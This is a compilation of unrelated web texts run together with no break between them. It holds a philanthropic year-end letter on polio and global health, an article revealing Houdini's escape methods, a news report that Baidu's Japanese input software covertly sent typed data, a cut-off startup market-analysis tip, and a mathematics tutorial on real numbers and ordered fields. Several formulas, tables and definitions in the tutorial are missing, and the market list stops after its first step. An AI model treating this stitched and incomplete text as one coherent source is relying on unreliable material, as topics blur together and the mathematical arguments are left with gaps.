We got smarter and faster at fighting polio. You may have heard about recent polio outbreaks in Syria, Kenya, and Somalia. What you may not know is just how rapid and effective the response has been. It looks like the outbreak in the Horn of Africa was controlled in 4 months, less than half the time it took to control an outbreak there in 2005. That speed is due in part to the work done at the Global Vaccine Summit held inAbu Dhabi this year. In the past, the world has had to make tough trade-offs between responding to outbreaks, improving routine immunization, and fighting the disease in the last three countries where polio is still circulating (Afghanistan, Pakistan, and Nigeria). There was no coordinated plan or long-term funding for doing all three at once. At the summit the world got both. We adopted a comprehensive plan for pursuing all three goals, including making the world polio-free by 2018. And more than 30 donors—including a number of very generous private individuals—backed the plan with a total of $4 billion in long-term funding. That means we won’t have to make those trade-offs anymore. It’s a huge step forward.

There’s also great news from India. In early 2014, India will have gone three years without a single polio case (assuming no new ones are reported between now and then). That’s a testament to the fantastic job they’ve done immunizing every child, even in the most remote parts of the country. Now they’re focused on keeping the disease from coming back.

Next door, in Pakistan, the political leaders are clearly resolved to get polio out of the country once and for all. When I met Prime Minister Nawaz Sharif this fall, he made it clear that he sees vaccinating children as a matter of justice. Despite the ongoing violence there and in Afghanistan—including horrifying reprisals against vaccine workers—the next couple of years are a good opportunity for us to make progress on this goal.

Child mortality went down—again. One of the yearly reports I keep an eye out for is “Levels and Trends in Child Mortality.” The title doesn’t sound especially uplifting, but the 2013 report shows amazing progress—for example, half as many children died in 2012 as in 1990. That’s the biggest decline ever recorded. And hardly anyone knows about it! If you want to learn more—and I’d urge you to—the report has a good at-a-glance summary on page 3.

The poverty rate went down—again. If you want to read just one article that explains the state of the world’s poor and the future of the fight against poverty, check out “Not Always With Us,” which the Economist ran in June. It gives a short but thorough overview of the progress so far—the poverty rate has dropped by half since 1990—and the prospects for keeping it going. As the article says, the biggest factor in reducing poverty over the past few decades has been economic growth—growth that touches not just those who are already rich, but a broad range of people. We’ll need to maintain this growth in the coming decades to keep the poverty numbers coming down. That’s one reason I argue for stepping up our investments on health: Health may not cause growth directly, but it does help lay the foundation for it. I never miss an issue of the Economist, and this might be the best piece they ran this year.

Rich countries re-committed to saving lives. Just this month, donors met in Washington, D.C., to renew their funding commitments to the Global Fund to Fight AIDS, TB, and Malaria. I was there and I got to meet Connie Mudenda, a Zambian woman living with HIV who started getting treatment in 2004 thanks to the Global Fund. The medicine she takes costs just 40 cents a day, and it helped her get healthy, go back to work, and support her family. Connie says that a decade ago, she’d often see people who were so sick with AIDS that they couldn’t even walk. A family member would push them down the street in a wheelbarrow. Today, though, 80 percent of Zambians with HIV have access to treatment, the country’s economy is growing, and Connie says the wheelbarrows have vanished.

There’s a terrible Catch-22 in global health: You need new tools to fight diseases, but if you can’t pay to deliver them, they don’t get made; and if they don’t get made, then no one gives money to deliver them. So it’s fantastic that donors are stepping up to avoid this problem by making big commitments to the Global Fund. Here’s a handy infographic that shows what a massive impact the Fund has had.

A fantastic Web site got launched. If you love data, and if you’re curious about what causes the most suffering around the world, you should check out the Global Burden of Disease Web site, which was launched early this year. (The foundation helped pay for it.) Personally I am a yes on both categories, which is why I have spent a lot of time on there. It lets you make beautiful charts that help you understand the impact of disease in different countries and even see how things change over time.

On a personal note, I should say how grateful I am to everyone who made time to meet with me, from world leaders to health workers in India, Nigeria, Pakistan, and around the globe. Some of these workers take great risks to help people, facing attacks from extremists in order to vaccinate children. They are true global-health heroes.

What’s Ahead in 2014

Next year I’m excited about the continued rollout of a vaccine called pentavalent (because it prevents five diseases). Next year it will be available in South Sudan, the last of the 73 poorest countries to introduce it. India just announced that they’ll start giving it to every child in the nation in 2014. If other countries follow India’s example, pentavalent could prevent 7 million deaths by 2020. Next up are new vaccines to prevent pneumonia and rotavirus (which causes diarrhea). And we’re seeing more middle-income countries like China and India develop the ability to manufacture vaccines, which drives the cost down.

Crucial to delivering all these vaccines is GAVI, an alliance that has helped 440 million children get immunized since 2000. (Go back and read that again: 440 million.) Next year GAVI will be asking donors to renew their commitments, just as the Global Fund did this year. It will be a challenge to raise more money, but I know from experience that people want to help kids get vaccinated when they see what a phenomenal impact it has. It’s hard to resist the thrill of helping to save the life of a single child, let alone millions.

One last note about 2014: I’ll be publishing my sixth annual letter in January. This time I’m planning to take a slightly different tack from years past—Melinda and I will be tackling some of the biggest myths we encounter in our work on health and poverty. It should be a fun one to write. If you’d like to get an e-mail notice when the letter is out, you can sign up here.

Exposing Houdini’s Tricks of Magic

By R. D. ADAMS

The mechanic who made Houdini’s Trick Magic Apparatus

Harry Houdini, Prince of Magicians, carried with him to the grave the secrets of his extraordinary feats of illusion. Only one man, the artisan who made his magic apparatus, knows the working secrets of Houdini’s most mystifying stunts. That man, Mr. R. D. Adams, continues here his fascinating expose of the master magician’s methods.

HOUDINI was a master at the art of obtaining free publicity. No performer ever put on as many free shows for the purpose of breaking into print, and for that matter, few if any, were ever as liberal as he in the matter of entertaining lodges and other groups without charge. Many times he risked death in his publicity seeking stunts.

“If the public,” he once told me, “knew how much I really flirt with death in some of my stunts, I would never be accused of getting advertising free.”

Frequently Houdini permitted himself to be locked in a regulation steel safe. There was only one way for him to free himself— with the aid of a small screwdriver with which he invariably was armed for this feat. It seems comparatively easy for one possessed of his uncanny knowledge of locks to unscrew the plate covering of tumblers which control the bolt of a safe. But when one remembers that in most instances the prisoner was so closely wedged into the vault that he could barely move his hands, that he was forced to operate in pitch darkness, guided only by his sense of touch, the feat becomes quite complicated. Once he had pressed the tumblers in the proper order, of course the door would swing open. But if by some misadventure in the darkness, he had disarranged the mechanism, those on the outside would have been unable to shoot the bolts with the aid of the combination knob. The prospect of being enclosed in a vault with only sufficient air to sustain life for a few minutes and being dependent upon a professional safecracker for rescue in case you happen to jam the mechanism of the lock is not a very inviting one.

For years Houdini’s best avenue to the front page of the newspaper was by escaping from prison cells. Although he was often forced to strip naked before being locked up and was subjected to the most minute search, he was never without a picklock. Sometimes he secreted it in the cell while he was inspecting it prior to incarceration. A bit of wax and it could instantly be fastened on the lower side of a bar. Sometimes the pick was taped in the armpit or on the sole of his foot. And Houdini, with one glance at the lock of the cell he was inspecting, knew whether the pick he would have available would do the work desired of it.

In recounting to me some of his narrow escapes, Houdini once told of an experience with his trunk trick. At that time he was permitting committees to handcuff him, place him in a trunk, rope it securely and toss him into a river or lake, while thousands, including reporters and news photographers looked on.

The escape was made in the same manner of the familiar stage trick in which the magician is locked inside a trunk and within a few seconds after it is slipped behind a screen, changes places with a lady assistant—with the aid of a sliding panel.

Immediately Houdini got into the trunk for his stunt he went to work on his handcuffs and other shackles, and was free of them by the time the roping had been done. On one occasion the trunk sank rapidly and stuck on a muddy bottom, panel side down. It was only by the most desperate efforts, Houdini was able to force the panel through the sticky mud and escape drowning.

“That gave me a lesson,” he said. “Thereafter I made it a point to have the panel part way open before the bottom was reached. Sometimes I would be out and have the panel shifted back in place without reaching the bottom.”

Of course, one of the essential points in this performance was to have an assistant who saw to it that all the roping done would not make it impossible to move the panel.

Houdini’s famed “disappearance through a brick wall” was one of his most widely applauded stunts. That it mystified the public is putting it mildly. Just a short time ago a leading scientific journal announced that the magician made his disappearance by means of a trapdoor on one side of the wall and came up through a similar channel on the other. That was wholly impossible. A trapdoor, regardless of how cleverly it had been constructed, would have been detected by the investigating committee. And besides to mystify his audience still further and demonstrate that a trapdoor was not used, a large sheet of paper and sometimes a sheet of plate glass was placed upon the floor of the stage and the brick wall built upon it. Passing through glass into trapdoors and vice versa was not possible even for the great man of mystery.

Here is how Houdini operated: A dozen or more bricklayers in overalls appeared before the audience and built a bona fide brick wall seven or eight feet high extending from the footlights to almost the rear of the stage. When it was completed, Houdini was ready to “disappear”. After a few appropriate remarks, he stepped behind a small screen, something like a prompter’s box, which the bricklayers pushed slowly to the center of the wall. The bricklayers moved over to the other side and adjusted a similar screen there opposite the first one. “Here I am, here I am,” Houdini would shout and waving arms thrust through holes in the screen gave evidence of the fact.

Then the arms would disappear and Houdini would step forth from the screen on the other side of the wall.

Houdini disappeared through the wall only in the minds of the exceedingly gullible. As a matter of fact while the first screen, behind which he had stepped, was being pushed back against the wall, he leaped into a pair of blue jumpers and pulled a workman’s cap down far over his face. When the screen touched the wall, he was one of the bricklayers as far as the audience was concerned. He got behind the second screen disguised as a bricklayer. From this point he did his calling to the audience. Mechanical arms and hands, operated by a hidden rope leading to the wings, furnished the gestures which convinces Houdini was behind screen No. 1 instead of No. 2 completing the illusion.

Houdini probably possessed more information about magic and conjuring than all other artists combined. He had a library of hundreds of volumes dealing with this subject and occasionally he would completely mystify his friends with a stunt that was generations old. He once told me of a private performance he put on to entertain a small group of friends and completely mystified them. The trick itself was an ancient one. Calling for three of the ladies to hand him their handkerchiefs, he knotted them together and announced that he would have them appear anywhere the audience suggested, the suggestions to be made on slips deposited in a hat. A child drew one of the slips out of a hat, suggesting that the handkerchiefs reappear on the steps of a public institution three miles away. And they were found there a half hour later soldered in a tin box that had to be cut open.

Here were the steps in the deception. When Houdini knotted the handkerchiefs, he substituted three others for the ones in question and placed them under the dish cover. When he collected the slips of paper, he dropped in a few slips on top which he himself had written, each one designated the steps of the institution as the place the handkerchiefs were to be whisked. And while fumbling with the dish cover, he accidentally broke it. It was necessary to step to one side and obtain another of the same kind from his assistant who, during the process, was presented with the original handkerchiefs Houdini had palmed.

By stalling long enough to give time for another confederate to seal the handkerchiefs in the box and get a good start of the committee, it was perfectly simple to have the missing articles found as requested.

Having convinced most of the credulous that no shackles or bolts could imprison him, Houdini set out to prove it was impossible to entomb him—even in the grave.

In scores of cities he invited workmen to fashion a packing box that would hold him prisoner and various artisans, jealous of their craftsmanship, spent much time trying to devise boxes that the man of mystery could not escape from. The boxes made by the determined workmen would be brought upon the stage, Houdini would step inside and with a mighty pounding and at the expenditure of an unusual supply of nails, the lid would be hammered down with unusual tightness and solidity.

Sometimes a full half hour would elapse before Houdini, who of course worked surrounded by the usual screen, would liberate himself. And invariably the orchestra would play loudly while he was making his escape in order that no nails would emit a screech as they were being forced out of the wood into which they had been driven.

The secret of the escape was this: Houdini, upon entering the box, invariably had concealed under his clothing a device weighing two or three pounds which worked something on the order of an automobile jack. It consisted of two steel pipes one an inch and the other three fourths of an inch in diameter which telescoped together. At the top and the bottom of this “Open Sesame” was a T shaped bar four or five inches long and an inch wide. The pipes, threaded on the outside were held together in the center by a turn-buckle which when twisted by Houdini’s muscular hands exerted a pressure no nails could withstand. Having once forced off a board large enough to permit his escape, all Houdini had to do was to replace the board and press the nails back into the original holes while the orchestra drowned his carpentering.

As a variance of this trick, Houdini permitted glaziers to place him in a glass box and seal the cracks with putty. As soon as he was behind the screen, he would exert enough pressure to break the putty, carefully holding the glass to prevent it from crashing, step out, reach into his cabinet of many secret compartments for his own glazing tools and replace the glass. If in the process of his operations, he broke the glass, he had other sheets of the same size hidden in the cabinet with which to replace the shattered one.

I have spoken before of Houdini’s great lung capacity. But by diligent practice he also brought himself to a point where he could exist for a long period on an unbelievably small amount of air. This stood him in good stead during his experiences in packing boxes and glass cases. It also enabled him to stage a great publicity feat in California where he permitted himself to be placed in a casket and be buried some feet under ground. It was noticeable that he chose for the scene of the demonstration a spot where the soil was extremely light in weight, else his task might have been impossible even with the aid of his jack which had enabled him to break out of so many packing boxes. I did not witness this performance, but I very much suspect that the jack enabled him to force up the coffin lid to a position where he could bring his Herculean back and shoulder muscles into play effectively enough to break forth from the grave.

Free online software provided by China's Baidu search engine has been covertly sending almost all information inputted in Japanese to Baidu Inc.’s servers, according to a computer security company.

According to Takayuki Sugiura, president of NetAgent, when individuals use the Baidu IME software, information entered in full-width characters, kanji converted from hiragana, computer ID numbers and information on e-mail programs and word-processing programs being used, are automatically sent to Baidu Inc.’s servers in Japan.

“I want people to stop using the software until it is revised,” Sugiura said.

Baidu Inc. says on its webpage that the Baidu IME program, released in 2010, has a function to send inputted data to its servers so that it can improve its Japanese conversion capabilities.

Although this automatic data transmitting function is switched off in the default setting, Sugiura found that Baidu IME secretly sends users’ information even when the function is turned off.

“It is a big problem that it sends data even if the function is switched off,” Sugiura said.

If users write in half-size characters and numbers, their information, such as IDs, passwords, and telephone numbers, is not sent, Sugiura said.

Sugiura said Baidu’s Japanese input software for smartphones, named Simeji, is also transmitting inputted user data that it is not supposed to.

It generally takes 20-30 hours to dig up all of the players in a space, which seems like a long time to spend looking. But, compared to spending 6-12 months building a product, 20-30 hours now isn't bad at all. Not putting in the hard yards looking is being blissfully ignorant. 

That doesn't mean that just because there's always lots of competition, the opportunity isn't there. If an entrepreneur spots a pain point, that means the market for solving it hasn't been completely filled. More importantly, a thorough market analysis is not to be discouraging:  it's a way to become an expert in a space and learn vicariously through competition.

This is my process of performing a market analysis, using the example of a fake Rideshare website:

1) Make a Google Spreadsheet with the the following columns: "Name", "Website", "Year Founded", "Funding", "Traction", "Strengths", and "Opportunities". Traction is how many users they have, their growth, and ideally, revenue, Strengths is what they're doing well and opportunities is what you plan to differently/better.

The short, simple answer used in calculus courses is that a real number is a point on the number line. That's not the whole truth, but it is adequate for the needs of freshman calculus. The freshman calculus course (at most universities nowadays) follows the 17th century style of Newton and Leibniz, emphasizing computations and omitting many proofs. The omitted proofs depend on a careful explanation of what the "real numbers" really are. That explanation and those proofs were not discovered until the 19th century, after Newton and Leibniz were long dead.

A proper explanation of the real numbers nowadays is covered, if at all, in a course in "real analysis" in the junior or senior year of students who are majoring in mathematics. Surprisingly few students take such a course; perhaps that's because it is too algebraic for the analysts' taste and too analytic to please the algebraists.

In this web page, I'll discuss the mathematical meaning of "real number." Before that, I want to discuss this more elementary question: where did the name "real" come from? (It turns out to have little to do with the deeper properties of real numbers.) To answer that question, I first need to talk about complex numbers.

Treating points in the plane as numbers

• The "addition" of points is described most simply as vector addition. A vector can be represented by a directed line-segment; two vectors are considered equal if they point in the same direction and have the same length. (See diagram.) We can change the representation of a vector by moving it (i.e., "translating" it) to a new position parallel to the original position.
  

  To add two vectors V1 and V2, represent them with directed line-segments so that the initial end of V2 is located at the terminal end of V1. Thus the arrows in the diagram form a path: start at the initial end of V1, proceed to its terminal end, then turn a corner and follow V2 from its initial end to its terminal end. The sum, or resultant, V1+V2, is the journey going from the initial end of V1 to the terminal end of V2. That sum is represented by a single directed line-segment, the dashed third side of the triangle.
  

  To represent vectors with the Cartesian coordinate system, draw a vector V so that its initial end is at the origin (0,0). Then the coordinates of the location of its terminal end are used as the coordinates of the vector. (See diagram.)
  

  If we use that coordinate system, then the formula for vector addition is very simple: The first coordinate of V1+V2 is the sum of the first coordinates of V1 and V2, and the second coordinate of V1+V2 is the sum of the second coordinates of V1 and V2. That is,

  (a,b) + (c,d) = (a+c, b+d)
• The "multiplication" that we want to use can also be described in Cartesian coordinates: (a,b) ⋅ (c,d) = (ac−bd, ad+bc). But that's a bit complicated and nonintuitive; it looks somewhat arbitrary and contrived. We get a much simpler, more geometrically appealing definition if we switch to polar coordinates. Let a point be represented by <r,θ> if it has radius r and angle θ -- i.e., if it is located r units away from the origin, and on a ray that is θ radians counterclockwise from the ray that points toward the right. That point has Cartesian coordinates (r cosθ, r sinθ). If you substitute those values into our Cartesian formula for multiplication, and then simplify using some trigonometric identities, you'll end up with this much simpler definition of multiplication: If P1 has polar coordinates <r1,θ1> and P2 has polar coordinates <r2,θ2>, then the product P1P2 is defined to be the point with polar coordinates <r1r2, θ1+θ2>.

  In other words, multiply the radii and add the angles. The effect of multiplying points in the plane by P2 is torotate the plane through an angle of θ2 and stretch (or shrink) the plane by a magnification factor of r2. This concept is very simple, and it's quite useful in engineering, which is often concerned with describing rotations (e.g., of engines).

Since (a,0)+(c,0)=(a+c,0) and (a,0)×(c,0)=(ac,0), the points along the horizontal axis have an arithmetic just like "ordinary" numbers; we will write (a,0) more briefly as a. For instance, (5,0) will be written as 5. The points along the vertical axis also have a shorter notation: the point (0,b) will be written more briefly as bi; for instance, (0,5) will be written as 5i. The i stands for "imaginary", for reasons explained below.

Important exercises. Using either the formula (a,b) × (c,d) = (ac−bd, ad+bc) or the definition in terms of polar coordinates, the beginner should now verify that i2 = −1. That will be important in the discussion below.

Here are the answers to those two exercises: Using the Cartesian coordinate system, we compute i2 = (0,1) × (0,1) = (0•0−1•1, 0•1+1•0) = (−1,0) = −1. Or, using polar coordinates: The number i has radius 1 and angle π/2. Hence the number i2 has radius 1•1=1 and angle (π/2) + (π/2) = π; the complex number with those polar coordinates is −1.

What's "real" about the real numbers?

You have to admire the genius of the 16th century mathematicians: They correctly worked out the arithmetic rules of the complex numbers despite their lack of the simple geometric model; they calculated with "numbers" whose existence they didn't even believe in!

Their terminology was unfortunate, however. There is nothing fictitious or dreamlike about rotations of engines, but the name stuck. The points on the vertical axis are now called imaginary numbers, despite the fact that they have very tangible applications. The points on the horizontal axis are (by contrast) called real numbers. All the points in the plane are calledcomplex numbers, because they are more complicated -- they have both a real part and an imaginary part.

Thus ends our tale about where the name "real number" comes from. But we have barely begun investigating the mathematical properties associated with that name.

Getting rid of the pictures

Imagine studying that picture of a line under a super microscope. If you could magnify the line at a very high power -- say at a magnification of a googolplex, or better yet a magnification of infinity -- would it still look the same? Or would you see a row of dots separated by spaces, like the dots in a picture in a newspaper? (It turns out that, in some sense, the real numbers would still look like a line under infinite magnification, but the rational numbers would be dots separated by spaces. But that is only a vague and intuitive statement, not anything precise that we can use in proofs.)

The only way to get rigorous answers to these questions is to set up a very careful system of axioms about geometry ... but that amounts to the same thing as setting up a careful set of axioms about the algebraic properties of the real numbers. It turns out that the latter is a little easier, so we may as well concentrate on the algebraic aspects of the situation. To answer questions like this, ultimately we have to get away from the pictures; we have to understand the real numbers entirely in terms of formulas.

As a preview, here is the definition that we're going to end up with:the real line is a Dedekind-complete ordered field. That's complicated, so we'll work our way up to it in stages. We'll discuss:

• What is a field?
• What is an ordered field?
• What is a Dedekind-complete ordered field?
• Why do I say that the real line is a Dedekind-complete ordered field? How can that be a definition?

Groups and fields

• X is a nonempty set.
• e is a specially chosen member of the set X. It is called theidentity of the group.
• * is a binary operation on X, which we may call thegroup operation. This means that whenever p and q are members of X, then p*q is also a member of X.
• (p*q)*r = p*(q*r) for all p,q,r in X.
• p*e = e*p = p for every p in X.
• For each p in X, there exists at least one corresponding q in X that satisfies p*q = q*p = e. (It can be shown that there isat most one such q, and thus q is uniquely determined by p; we call q the inverse of p.)

The group is said to be abelian (or commutative) if it also satisfies this property:

• p*q = q*p for all p,q in X.

Examples:

• (Z,0,+) is an abelian group, where Z is the set of all integers
• ({even integers}, 0,+) is an abelian group
• ({-1,1}, 1, x) is an abelian group
• (R+,1,x) is an abelian group, where R+ is the set of all positive real numbers
• (R\{0},1,x) is an abelian group, where R\{0} is the set of all nonzero real numbers. (Here "\" means the difference of two sets.)
• (T,1,x) is an abelian group, where T is the set of all complex numbers that lie along the unit circle centered at 0

Now, a field is a quintuple (Y,0,+,1,×) with these properties:

• Y is a set, 0 and 1 are two specially chosen members of Y, and + and × are two binary operations on Y.
• 0≠1.
• The triple (Y,0,+) is an abelian group.
• The triple (Y\{0},1,×) is an abelian group. (Note that this group has for its set of members, all the members of Y except 0.)
• p×(q+r) = (p×q) + (p×r) for all p,q,r in Y.

Here are a few examples:

• The rational numbers (i.e., numbers like 3/4 and -171/25) are a field.
• The real numbers (i.e., numbers like 87.324116279...) are a field.
• The complex numbers are a field. (Exercise: Verify all the axioms. Also, what is the multiplicative inverse of 3+2i ?)
• The set of all numbers of the form p+q√2, where p and q are rational numbers, is a field; it is a subset of the reals and a superset of the rationals. (Exercise: Verify all the axioms. Also, what is the multiplicative inverse of 3+2√2 ?)

Following is one more example. We will present a finite field -- that is, a field with only finitely many members. For the set Y, we'll use Y={0,1,2,3,4}. For its addition and multiplication operations, we'll use ordinary addition and multiplication, modified by this rule: If the result of addition or multiplication results in a number greater than 4, subtract 5 or 10 or 15, to get a number in the set Y again. In other words, we'll use these tables for addition and multiplication:

This field is sometimes called arithmetic modulo 5. (Exercises: Show that a similar field can be given with 5 replaced by any prime number. Show that there is also a field with 4 elements, and a field with 9 elements, but there is no field with exactly 6 elements. Much much harder: It can be shown that there is a field with exactly n elements, for some integer n, if and only if n is of the form pr for some prime number p.)

Ordered fields

• (Y,0,+,1,×) is a field.
• < is a binary relation on the set Y. This means that for each p and q in the set Y, either p < q is a true statement or p < q is a false statement. That can also be described this way: We are given some subset S of the set of all ordered pairs of elements of Y, and we abbreviate the sentence "(p,q) is a member of S" with the notation p < q.
• For each p and q in Y, one and only one of these three statements is true: p < q,     p = q,     q < p.

  (That's called the Trichotomy Law, because we are cutting the possibilities intothree cases.)

• For all p,q,r in Y, if p < q, then p+r < q+r.
• For all p,q in Y, if 0 < p and 0 < q, then 0 < p×q.

It can be shown that every ordered field contains, as a subset, an isomorphic copy of the rational numbers -- i.e., a set that is identical to the rational numbers in all its arithmetic operations; it may differ only in the names of some things, via a change in labeling. If you relabel things a bit, you can say that the rational numbers are a subset of every ordered field.

In particular, every ordered field contains infinitely many members. Therefore, the field of the arithmetic modulo 5 cannot be made into an ordered field by defining < in some clever way.

It can also be proved that, in any ordered field

• −1 < 0, and
• if p ≠ 0, then p2 > 0.

Infinitesimals

About 300 years ago, Newton and Leibniz invented calculus. Well, that's an oversimplification. Some of the ideas of calculus were already around, but they cleaned it up and knitted it together with what we now call the Fundamental Theorem of Calculus. Newton also showed some of the ways calculus can be used -- he worked out many of the basic laws of physics, and showed how to compute the orbits of the planets much more simply and accurately than anyone had ever done before. In doing so, he contributed greatly to the beginning of the Age of Enlightenment -- an age in which people realized that they can accomplish quite a lot through reasoning, and that they don't have to just live in fear, superstition, and confusion. This may have indirectly contributed to things like the industrial revolution and the birth of democracy.

Anyway, Newton and Leibniz knew how to do many of the computations that we now teach in calculus, but they didn't know how to do satisfactory proofs of the theory behind calculus. They tried to do proofs, but their explanations were a bit lacking. Many of their explanations were based on infinitesimals -- i.e., numbers that are infinitely small but not zero. For instance, in their explanations, dy/dx did not represent a limit of changing numbers. It represented a quotient of unchanging numbers, but those numbers were infinitesimals.

The computations of Newton and Leibniz were accepted by other mathematicians, but the proofs were not. The explanation of infinitesimals didn't entirely make sense, and mathematicians were uncomfortable with it. In the following centuries, Cauchy and Weierstrass produced the epsilon-delta proofs that we now find in calculus textbooks. Those proofs involve numbers that are of "ordinary" size (not infinitesimal), but the numbers would vary through many different ordinary sizes; thus we take the limit as epsilon changes toward zero. In our textbooks, dy/dx represents the limit of a changing quotient of two ordinary numbers. In the late 19th century, Dedekind finally gave a clear explanation of the real numbers (which we'll sketch at the end of this web page), and we can prove that in Dedekind's number system there are no infinitesimals. Arguments with infinitesimals were no longer needed and fell out of favor. Ultimately, infinitesimals were discredited and discarded by mathematicians (though they continued to be mentioned in some physics books many decades later).

In the 1960's, mathematician Abraham Robinson finally figured out how to make sense out of infinitesimals. Thusnonstandard analysis was born. It involved somenonstandard real numbers, among which we can find some infinitesimals. In the paragraphs below, I will give an example of an ordered field that has some infinitesimals. The discussion below is based on 20th-century ideas, not just on those of Newton and Leibniz. I should mention, however, that the example that I will present is not the approach preferred by the nonstandard analysts. They prefer an approach that is more complicated but also more powerful. (It involves making careful logical analysis of a formal first-order language, but we don't need to discuss that here.)

Some of the nonstandard analysts now actually feel that infinitesimals yield a better understanding of calculus. After all, it gave Newton and Leibniz the intuition that they needed. We can actually make rigorous mathematics, with only slight adjustments in the ideas of Newton and Leibniz. (For instance, the derivative should bethe standard part of that quotient of infinitesimals; this term is explained in a later paragraph below.) But most mathematicians still prefer the epsilon-delta approach, which they feel is simpler. (Both methods are correct, and both yield the same results.) At any rate, some discussion of infinitesimals may be helpful in our explanation of ordered fields.

Some ordered fields have infinitesimals, and some don't. The ordered fields that have no infinitesimals are calledArchimedean fields; we'll see later that the real number system (i.e., Dedekind's number system, also known as the standard real numbers) is Archimedean. The ordered fields that do have infinitesimals are called non-Archimedean fields; we'll give an example of such a field in the next few paragraphs.

The example will be based partly on rational functions. By a rational function in the variable t, we will mean a function of the form p(t)/q(t), where p(t) and q(t) are polynomials with standard real coefficients, and q is not the constant polynomial 0. Note that each real number can be viewed as a rational function -- for instance, the number 7 can be viewed as 7/1, where 7 and 1 are both polynomials of degree 0. Thus the set of real numbers is a subset of the set of rational functions. (Of course, to make sense of this, we have to assume that we already have some understanding of the real numbers. But we won't need a very deep understanding; the "points on a line" conception will suffice for now.)

We define addition and multiplication of rational functions in the usual fashion, as in high school algebra. However, we make this one alteration in the usual treatment of rational functions: We will consider two rational functions to be "the same" if they agree except at finitely many values of t. For instance, these two functions

are not really the same, because the first one is defined at t = −2 and the second one is not. But the two functions are identical for all other values of t, so we will view them as "the same" for purposes of the present discussion. With that convention, it can be shown that the set of all rational functions is a field.

Also, the real numbers are a subset of the rational functions. For instance, the constant 1 and the constant 7 are polynomials of degree 0, so the constant 7/1 is a rational function. In this fashion we can view every real number as a rational function.

We can make the rational functions into an ordered field, if we just define the right ordering. To do so, we will make use of the following theorem. (We will omit the proof of the theorem, which is a bit harder, but it just involves some advanced calculus and some college algebra.)

We now define an ordering on the rational functions, by saying that

if cases 1, 2, or 3 hold, respectively. In other words, one rational function is less than another if it is eventually less -- i.e., if it is less when we go far enough to the right on the graphs of the two functions. How far to the right we have to go may depend on which two functions we're looking at; but the theorem says that for each choice of two rational functions, there is some point after which one function stays below the other (unless they're the "same").

With this definition of ordering, it turns out that the set of rational functions is an ordered field. But it also turns out that the functions

are infinitesimals. Thus, the field of rational functions is non-Archimedean, when ordered as we have described.

How does this relate to Newton's view of numbers? I'm sure that Newton wasn't thinking of his infinitesimals as rational functions. But we can get some idea of his viewpoint, as follows:

There are no infinitesimals among the standard real numbers. But we could imagine that, with a sufficiently powerful microscope, we might discover some additional "nonstandard" numbers that we had not noticed before. Nestled around each standard real number r, infinitely close to it, are infinitely many new nonstandard numbers. (Then r is the standard part of any of those new numbers.) In particular, nestled around 0 are the infinitesimals. We can also get some other nonstandard numbers by taking the reciprocals of the infinitesimals; those numbers are infinitely large. The collection of all the numbers -- both "standard" and "new", together -- is an ordered field. Its ordering is the same as the ordering of the set of rational functions.

Least upper bounds

If the set S has an upper bound, then in general it has many upper bounds. Say B is the set of upper bounds of S, and B is nonempty. Does B have a lowest member? If it does, that member is called the least upper bound of the set S.

The word "complete" has different meanings in different branches of mathematics. Generally, an object is called "complete" if there are no "holes" in it -- i.e., if nothing that seemingly "ought to" be there is missing. This vague description has different meanings for different kinds of mathematical objects -- a complete ordered field, a complete measure space, a complete logic, etc. Here, we will only consider the meaning of completeness for ordered fields.

An ordered field Y is said to be complete, or Dedekind complete, if it has this property, also known as theleast upper bound property:

Dedekind completeness turns out to be crucial in analysis, because it enables us to take limits.

Some ordered fields are Dedekind complete, and some aren't. Here are two quick examples of ordered fields that aren't complete:

• The set of rational numbers is incomplete (i.e., not complete). To see this, let S be the set of all rational numbers r that satisfy r2 < 5. Then S has many upper bounds -- for instance, 3 is an upper bound, and 2.24 is another upper bound, and 2.23607 is another upper bound. We can keep finding more of these numbers -- whatever rational number we propose for an upper bound for S, it is possible to find another rational number that is still a little lower and that is also an upper bound for S. You can probably see why already: These numbers are converging to √5 = 2.23606797749978969640917366873128...

  But that number is not rational. Any rational upper bound for S would have to be slightly higher than √5, and between that rational number and √5 we can always find still another rational number. In the field of rational numbers, the set S does not have a least upper bound.

• If Y is a non-Archimedean field -- i.e., an ordered field that has infinitesimals -- then Y is incomplete. One way to see this is to let S be the set of all infinitesimals. Since some of the infinitesimals are positive, any upper bound for S must be greater than 0. Note that 1 is an upper bound for S, and 1/2 is another upper bound for S, and 1/3 is another upper bound for S, and so on. Suppose (for contradiction) that b were the least upper bound for S. Then b must be positive, and must be less than or equal to all of the numbers 1, 1/2, 1/3, etc. -- thus b must be a positive infinitesimal. Then 2b is also an infinitesimal, so 2b is a member of S. Since b is an upper bound for S, that tells us 2b < b. But b < 2b since b is positive. This is a contradiction.

Complete fields

The definition of the reals depends on two more theorems, both of which are difficult to prove.

The literature contains many different proofs of this theorem. I think three are simple enough to deserve mention here:

• Proof using decimal expansions. Let Y be the set of all infinite decimal expansions -- i.e., expressions such as 3.682951... and −17.311897... . Adopt the convention that 2.719999... is the "same" as 2.7200000..., etc. Use the usual operations of addition and multiplication. Then Y is a complete ordered field, but verifying that fact is extremely tedious. It generally isn't worked out in full detail. One place that you can find it in fairly complete detail is in J. F. Ritt, Theory of Functions, 1946. It is also sketched in M. Rosenlicht, Introduction to Analysis, reprinted by Dover.
• Proof using Dedekind cuts. Let Q be the set of rational numbers; we assume that we already have a good understanding of those. By a Dedekind cut we mean a pair (A,B) with these properties:
  • A and B are nonempty subsets of Q whose union is Q
  • a < b, for every a ∈ A and every b ∈ B
  • A has no highest element.
  The set B might or might not have a lowest element. Here are some examples of cuts in which B has a lowest element: A-2 = {x ∈ Q:   x < -2},    B-2 = {x ∈ Q:   x > -2}               A3.7 = {x ∈ Q:   x < 3.7},    B3.7 = {x ∈ Q:   x > 3.7} and here is an example of a cut in which B has no lowest element: A = {r ∈ Q:   r < 0    or    r2 < 5},      B = {r ∈ Q:   r >0   and   r2 > 5}. (That cut would be called (A√5, B√5) if we had a √5.) The set of all cuts can be made into a complete ordered field, if we define addition and multiplication the right way. Again, it's tedious; you can find some of the details worked out in W. Parzynski and P. Zipse,Introduction to Mathematical Analysis.
• Proof using Cauchy sequences. Again start from the rational numbers. Say that a sequence r1, r2, r3, ... of rational numbers is a Cauchy sequence if it has the property that for each positive integer p there exists a positive integer m (which may depend on p and on the particular sequence being studied) such that, whenever i and j are greater than m, then |ri − rj| < 1/p.

  Now, say that two Cauchy sequences r1, r2, r3, ... and s1, s2, s3, ... of rationals are equivalent if they have the property that

  for each positive integer p there exists a positive integer m (which may depend on p and on the particular sequences being studied) such that, whenever i is greater than m, then |ri − si| < 1/p.

